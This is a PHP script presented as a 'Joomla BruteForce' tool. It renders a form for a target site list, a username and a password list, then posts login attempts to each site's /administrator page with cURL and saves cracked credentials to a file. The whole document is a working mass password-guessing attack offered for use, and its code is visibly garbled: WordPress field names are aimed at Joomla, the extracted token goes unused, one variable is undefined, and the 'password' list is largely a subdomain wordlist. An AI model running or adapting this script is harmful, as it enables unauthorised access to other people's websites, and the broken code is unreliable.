Untitled


<?
echo '<html>
<head>
	<link href="https://image.ibb.co/j9hReU/cze.png" type="image/x-icon" rel="shortcut icon" />
	<meta name="author" content="CZE" />
    <meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
    <meta name="description" content="CZE" />
<title>Joomla BruteForce</title>
  <style type=\'text/css\'>
 input[type=submit], input[type=button], input[type=reset]{
	text-align:center;
	background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
	border:1px solid #4D4D4D;
	color:#FFFFFF;
	border-top-color:#565656;
	padding:4px 6px;
	margin:4px 5px;
	height:16px;
	-moz-box-shadow:0 0 1px black;
	-webkit-box-shadow:0 0 1px black;
	box-shadow:0 0 1px black;
	text-shadow:0 1px black;
	-moz-border-radius:4px;
	-webkit-border-radius:4px;
	-khtml-border-radius:4px;
	border-radius:4px;
	height:23px;
}


input[type=text], input[type=password]{
	background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
	border:1px solid #4D4D4D;
	color:#CCCCCC;
	border-top-color:#565656;
	-moz-box-shadow:0 0 1px black;
	-webkit-box-shadow:0 0 1px black;
	box-shadow:0 0 1px black;
	-moz-border-radius:4px;
	-webkit-border-radius:4px;
	-khtml-border-radius:4px;
	border-radius:4px;
	height:18px;
	margin-left: 5px;
}
input , textarea , button , body , caption , table ,area , option {
    outline:none;
    transition: all 0.20s ease-in-out;
    -webkit-transition: all 0.25s ease-in-out;
    -moz-transition: all 0.25s ease-in-out;
    border-radius:3px;
    -webkit-border-radius:3px;
    -moz-border-radius:3px;
    //border:1px solid rgba(0,0,0, 0.2);
 /*   font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
}
input , textarea {
    background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
}

input , textarea {
    outline:none;
    transition: all 0.20s ease-in-out;
    -webkit-transition: all 0.25s ease-in-out;
    -moz-transition: all 0.25s ease-in-out;
    border-radius:3px;
    -webkit-border-radius:3px;
    -moz-border-radius:3px;
    border:1px solid rgba(0,0,0, 0.2);
}
input:focus, textarea:focus {
  outline: 0;
  border-color: rgba(82, 168, 236, 0.8);
  -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);


    background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
    overflow: auto;

}
.x1 {}
.x2 {font-size:13px;
background-color:green;
color:black;}
hr {color:white;}
a {color:black;}
#x5 {
	font-family:tahoma;}
.d1 {color :#C17E0B;
font-family:tahoma;
font-size:13px;
font-weight:bold;}
#d4 {color:#C17E0B;
font-family:tahoma;
font-weight:bold;}
  </style>
  </head>
</br></br>
<center><b><font >-=JOOMLA BRUTEFORCE=-</font></b><br /><br /><br />
<center><b><font >Get Password from configuration.php</font></b><br /><br /><br />
<style>
body {
    background-image:url("https://preview.ibb.co/b1sEZU/kaneki.png");
    background-repeat: no-repeat;
    background-size: 100% 100%;
    </style>
<form method="post" action="" enctype="multipart/form-data">
<table width="50%" border="0">
<tr><td><p ><font class="d1">User :</font>
<input type="text" name="usr" value=admin size="15"> </font><br /><br /></p>
</td></tr>
<tr><td><font class="d1">Sites list :</font>
</td><td><font class="d1" >Pass list :</font></td></tr>
<tr><td>
<textarea name="sites" cols="40" rows="13" ></textarea>
</td><td>
<textarea name="w0rds" cols="20" rows="13" >
admin
123456
password
102030
123123
12345
123456789
pass
test
admin123
demo
!@#$%^
0
01
02
03
1
10
11
12
13
14
15
16
17
18
19
2
20
3
3com
4
5
6
7
8
9
ILMI
a
a.auth-ns
a01
a02
a1
a2
abc
about
ac
academico
acceso
access
accounting
accounts
acid
activestat
ad
adam
adkit
admin
administracion
administrador
administrator
administrators
admins
ads
adserver
adsl
ae
af
affiliate
affiliates
afiliados
ag
agenda
agent
ai
aix
ajax
ak
akamai
al
alabama
alaska
albuquerque
alerts
alpha
alterwind
am
amarillo
americas
an
anaheim
analyzer
announce
announcements
antivirus
ao
ap
apache
apollo
app
app01
app1
apple
application
applications
apps
appserver
aq
ar
archie
arcsight
argentina
arizona
arkansas
bd
bdc
be
bea
beta
bf
bg
bh
bi
billing
biz
biztalk
bj
black
blackberry
blog
blogs
blue
bm
bn
bnc
bo
bsd0
bsd01
bsd02
bsd1
bsd2
bt
bug
buggalo
bugs
bugzilla
build
bulletins
burn
burner
buscador
buy
bv
bw
by
bz
c
c.auth-ns
ca
cache
cafe
calendar
california
call
calvin
canada
canal
canon
careers
catalog
cc
cd
cdburner
cdn
cert
certificates
certify
certserv
certsrv
cf
cg
cgi
ch
channel
channels
charlie
charlotte
chat
chats
chatserver
check
checkpoint
chi
chicago
ci
cims
cincinnati
cisco
citrix
ck
cl
class
classes
classifieds
classroom
cleveland
clicktrack
client
clientes
clients
club
clubs
cluster
clusters
cm
cmail
cms
cn
co
cocoa
code
coldfusion
colombus
colorado
columbus
com
commerce
commerceserver
communigate
community
compaq
compras
con
concentrator
conf
conference
</textarea>
</td></tr><tr><td>
<font >
<input type="submit" name="x" value="start" id="d4">
</font></td></tr></table>
</form></center>';
@set_time_limit(0);


if($_POST['x']){

echo "<hr>";

$sites = explode("\n",$_POST["sites"]);
$w0rds = explode("\n",$_POST["w0rds"]);

$Attack = new Wordpress_brute_Force(); // Active Class


foreach($w0rds as $pwd){

foreach($sites as $site){


$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();

}

}

}


# Class & Function'z

function txt_cln($value){  return str_replace(array("\n","\r"),"",$value); }

class Wordpress_brute_Force{

public function check_it($site,$user,$pass){ // print result

if(eregi('profile.php',$this->post($site,$user,$pass))){
 echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/'>$site/wp-admin/</a></b></span><BR>";
$f = fopen("configuration.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/\n"); fclose($f);
flush();
}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}

}

public function post($site,$user,$pass){ // Post -> user & pass
$login =$site.'/administrator';
$to = $site.'/administrator';
$token = $this->extract_token($site);
$log = array ('Log In','دخول');
$data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','jm-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);

$curl=curl_init();

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$login);
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

public function extract_token($site){ // get token from source for -> function post

$source = $this->get_source($site);

preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);

return $token[1][0];

}

public function get_source($site){ // get source for -> function extract_token

$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$login);
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

}
?>